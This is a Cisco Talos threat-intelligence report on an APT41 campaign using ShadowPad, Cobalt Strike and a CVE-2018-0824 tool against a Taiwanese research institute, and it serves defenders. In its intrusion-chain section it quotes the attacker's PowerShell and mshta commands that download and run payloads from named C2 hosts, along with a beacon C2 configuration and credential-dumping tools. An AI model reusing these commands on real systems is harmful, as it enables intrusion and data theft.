- Cisco Talos discovered a malicious campaign that compromised a Taiwanese government-affiliated research institute that started as early as July 2023, delivering the ShadowPad malware, Cobalt Strike and other customized tools for post-compromise activities.
- The activity conducted on the victim endpoint matches the hacking group APT41, alleged by the U.S. government to be comprised of Chinese nationals. Talos assesses with medium confidence that the combined usage of malware, open-source tools and projects, procedures and post-compromise activity matches this group’s usual methods of operation.
- The ShadowPad malware used in the current campaign exploited an outdated vulnerable version of Microsoft Office IME binary as a loader to load the customized second-stage loader for launching the payload.
- We also discovered that APT41 created a tailored loader to inject a proof-of-concept for CVE-2018-0824 directly into memory, utilizing a remote code execution vulnerability to achieve local privilege escalation.
In August 2023, Cisco Talos detected abnormal PowerShell commands connecting to an IP address to download and execute PowerShell scripts in the environment of a Taiwanese government-affiliated research institute. The victim in this attack was a research institute in Taiwan, affiliated with the government, that specializes in computing and associated technologies. The nature of research and development work carried out by the entity makes it a valuable target for threat actors dedicated to obtaining proprietary and sensitive technologies of interest to them.
Cisco Talos assesses with medium confidence that this campaign is carried out by APT41, alleged by the U.S. government to be comprised of Chinese nationals. This assessment is based primarily on overlaps in tactics, techniques and procedures (TTPs), infrastructure and malware families used exclusively by Chinese APT groups. Talos’ analyses of the malware loaders used in this attack reveal that these are ShadowPad loaders. However, Talos has been unable to retrieve the final ShadowPad payloads used by the attackers.
ShadowPad, widely considered the successor of PlugX, is a modular remote access trojan (RAT) only seen sold to Chinese hacking groups. The malware was publicly reported being used by APT41, which is a hacking group believed to be based out of Chengdu, China, according to the U.S. Department of Justice. Along with APT41 it has also been used by other Chinese hacking groups like Mustang Panda and the Tonto Team.
During the investigation, we observed a couple TTPs or IoC that were observed in previous reported campaigns, including the following:
- The same second stage loader binary: A second stage loader, that acts as a successor to the initial side-loaded ShadowPad loader, discovered by Talos was also linked to ShadowPad and previously associated with Shadowpad publicly. We have also observed identical loading mechanisms, infection chains and file names being utilized in the current attacks with reliable previous open-source reporting.
- Infrastructure overlapping: Beside the binary connection, we also found a C&C (103.56.114[.]69) that was reported by Symantec. Although the campaign reportedly ran in April 2022, which is more than one year before the campaign we discovered, there were a few similarities between the TTPs observed in the two campaigns. This includes using the same Shadowpad Bitdefender loader, using similar file names for the tool, using Filezilla for moving files between endpoints and using the WebPass tool for dumping credentials.
- The employment of Bitdefender executable for sideloading: The malicious actor leverages Bitdefender where it uses an eleven year old executable to sideload the DLL-based ShadowPad loader. This technique has been seen in a variety of reports which have been attributed to APT41. This technique has been reported in multiple reports (Reports: 1, 2, 3, 4).
Chinese Speaking Threat Actor
This attack saw the use of a unique Cobalt Strike loader, written in GoLang is meant to evade detection of Cobalt Strike by Windows Defender. This loader is based on an anti-AV loader named CS-Avoid-Killing hosted on Github and written in Simplified Chinese. The repository is promoted in multiple Chinese hacking forums and technical tutorial articles.
The Cobalt Strike loader also consists of file and directory path strings in Simplified Chinese, indicating that the threat actors that built/compiled the loader were well-versed in the language.
In August 2023, Cisco Talos detected abnormal Powershell commands connected to an IP address to download Powershell script for execution in the environment of the target. We performed an investigation based on our telemetry and found the earliest infiltration trace from mid July, 2023. We currently lacked sufficient evidence to conclusively determine the initial attack vector. The threat actor compromised three hosts in the targeted environment and was able to exfiltrate some documents from the network.
Upon accessing the network, attackers start to gain a foothold by executing malicious code and binaries on the machine. On the machine with the web server, a webshell is installed to enable the threat actor’s ability to perform discovery and execution. The threat actors also dropped malwares including Shadowpad and Cobalt Strike with three different approaches: the installed webshell, RDP access and the reverse shell.
Webshell drop
C:/www/un/imjp14k.dll C:/www/un/service.exe C:/www/un/imjp14k.dll.dat |
RDP drop
C:/Users/[hide]/Desktop/log.dll C:/Users/[hide]/Desktop/imjp14k.dll C:/Users/[hide]/Desktop/service.exe C:/Users/[hide]/Desktop/imjp14k.dll.dat C:/Users/[hide]/Desktop/log.dll.dat |
Reverse shell drop
C:/Users/Public/calc.exe C:/Users/Public/service.exe C:/Users/Public/imjp14k.dll C:/Users/Public/imjp14k.dll.dat C:/Users/Public/log.dll C:/Users/Public/log.dll.dat |
We noticed that a couple of the Shadowpad components were detected and quarantined by our solution when being dropped. The threat actor later changed their tactic to bypass the detection.The first attempt was running the following Powershell commands to launch the Powershell script for downloading additional scripts (Powershell and HTA) to run backdoor in memory.
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://103.56.114[.]69:8085/p.ps1');test123" powershell IEX (New-Object System.Net.Webclient).DownloadString('https://www.nss.com[.]tw/p.ps1');test123" mshta https://www.nss.com[.]tw/1.hta powershell -nop -w hidden -encodedcommand “JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFM..." |
However, the attempt was again detected and interrupted before the attackers could carry out further actions. Later on, the attackers used another two powershell commands to download Cobalt Strike malware from a compromised C2 server (www.nss.com[.]tw). The Cobalt Strike malware had been developed using an anti-AV loader to bypass AV detection and avoid the security product quarantine. The following command was used by the threat actor to download anti-AV malware and run the malware in the victim's host machine. A more detailed description about the Cobalt Strike loader can be found in the Malware and Malicious Tools Analysis.
powershell (new-object System.Net.WebClient).DownloadFile('https://www.nss.com[.]tw/calc.exe','C:/users/public/calc.exe');" powershell (new-object System.Net.WebClient).DownloadFile('https://www.nss.com[.]tw/calc.exe','C:/users/public/calc2.exe'); " |
During the compromise the threat actor attempts to exploit the CVE-2018-0824, with a tool called UnmarshalPwn, which we will detail in the sections below.
The malicious actor is careful, in an attempt to avoid detection, during its activity executes “quser” which, when using RDP allows it to see who else is logged on the system. Hence the actor can stop its activity if any other use is on the system. Cisco Talos also noticed that once the backdoors are deployed the malicious actor will delete the webshell and guest account that allowed the initial access.
Information gathering and exfiltration
We observed the threat actor harvesting passwords from the compromised environment. The actor uses mimikatz to harvest the hashes from the lsass process address space and WebBrowserPassView to get all credentials stored in the web browsers.
From the environment the actor executes several commands including using “net,” “whoami,” “quser,” “ipconfig,” “netstat,” and “dir” commands to obtain information on user accounts, directory structure, and network configurations from the compromised systems. In addition, we also observed query to the registry key to get the current state of software inventory collection on the system with the following command:
C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64 |
Beside running commands to discover the network, we also observed the Shadowpad sample perform lightweight network scanning to collect the hosts in the network. The malware tries to discover other machines in the same compromised network environment by connecting to the IPs under the same C class sequentially. The connections were all sent to port “53781”, with unknown reason.
To exfiltrate a large number of files from multiple compromised machines, we observed threat actors using 7zip to compress and encrypt the files into an archive and later using backdoors to send the archive to the control and command server.
Although there is no new backdoor or hacking tools in this attack, we did find some interesting malware loaders. The threat actor leverages two major backdoors into their infection chains in this campaign, including both shadowpad and cobalt strike malware. Those two major backdoors were installed via webshell, reverse shell and RDP by the attacker themselves. In addition, two interesting hacking tools were also found, one is to get local privilege escalation and the other is to get web browser credentials.
Shadowpad Loader
During our investigation of this campaign, we encountered two distinct iterations of ShadowPad. While both iterations utilized the same sideloading technique, they each exploited different vulnerable legitimate binaries to initiate the ShadowPad loader.
The initial variant of the ShadowPad loader had been previously discussed in 2020, and some vendors had referred to it as 'ScatterBee'. Its technical structure and the names of its multiple components have remained consistent with earlier reports.
The more recent variant of the ShadowPad loader targeted an outdated and susceptible version of the Microsoft Office IME imecmnt.exe binary, which is over 13 years old. Upon execution, this loader examines the current module for a specific byte sequence at offset 0xE367. Successful verification of the checksum prompts the loader to seek out and decrypt the "Imjp14k.dll.dat" payload for injection into the system's memory.
Furthermore, we conducted a pivot analysis of this latest loader using VirusTotal and other malware cloud repositories. We identified two different loader types, yet both employed the same legitimate binary to launch the malware.
- G:\Bee\Bee6.2(HD)\Src\Dll_3F_imjp14k\Release\Dll_3F_imjp14k.pdb
- G:\Bee\Tree\Src\Dll_3F_imjp14k\Release\Dll.pdb
Cobalt Strike “Anti-AV loader” from Chinese Open Source Project
There is a cobalt strike loader also detected in this incident. With deep analysis for this loader, we found the loader not only packed with UPX but modified the section name to anti-unpack the malware. There are some interesting observations here suggesting that the adversary may be speaking Chinese. The loader was developed by Go programming language and string in the binary indicates a project name “go版本” which means “go version” in mandarin. Based on the project name we found that the code was cloned from a github source that was written in simplified Chinese and the project is to avoid the cobalt strike being deleted by antivirus products.
Upon analyzing the malware and github page we found, we discovered that the attacker might have followed the github steps to generate this loader and deploy the cobalt strike beacon to the victim's environment, the screenshots are shown this loader will get an encrypted picture from C&C server and the code logical same as the one on github.
It’s important to highlight that this cobalt strike beacon shellcode used steganography to hide in a picture and executed by this loader. In other words, its download, decryption, and execution routines all happen in runtime in memory. This cobalt strike beacon configuration shown below.
{"C2Server": "http://45.85.76.18:443/yPc1", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"} |
Unmarshal.exe malware decrypts its payload with four stages. The first stage is the executable file which will try to search [filename].tbin, and inject a first stage decryption payload, inject_loader_1.dll, in an allocated memory block. The first stage decryption payload will decompress second stage payload, inject_loader_2.dll, and injection into memory, the second stage payload will also try to search *.dlls or ddb.dlls file for next stage payload. If it can not find the specific file, it will decrypt the final payload out and inject that payload into another memory block. After deeply analysis, we found the final payload is UnmarshalPwn malware which is a POC for CVE-2018-0824 and uses a remote code execution vulnerability to get local private escalation.
With the artifacts we found in this campaign, we pivoted and discovered some samples and infrastructure that were likely used by the same threat actors but in different campaigns. Although we don’t have further visibility into more details about these campaigns at the moment, we hope that by revealing this information, it would empower the community to connect the dots and leverage these insights for additional investigations.
We found 2 other Shadowpad loaders by pivoting the RICH PE header (978ece20137baea2bcb364b160eb9678) of the Shadowpad loader. Sharing the same RICH PE header indicates that these binaries share a similar compilation environment.
- 2e46fcadacfe9e2a63cfc18d95d5870de8b3414462bf14ba9e7c517678f235c9
- eba3138d0f3d2385b55b08d8886b1018834d194440691d33d612402ba8a11d28
One of the loader were observed downloaded from two C2 servers:
- 103.96.131[.]84
- 58.64.204[.]145
Beside the Shadowpad loader, we found the same Bitdefender loader (386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd) and a payload file on the C2 server. The Shadowpad payload connects to an interesting C2 domain w2.chatgptsfit[.]com for communication.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
ClamAV detections are also available for this threat:
Win.Packed.UnmarshalPwn-10019484-0
Win.Packed.CobaltStrike-10019485-0
Win.Loader.UnmarshalPwn-10019486-0
Win.Loader.Shadowpad-10019487-0
IOCs for this research can also be found at our GitHub repository here.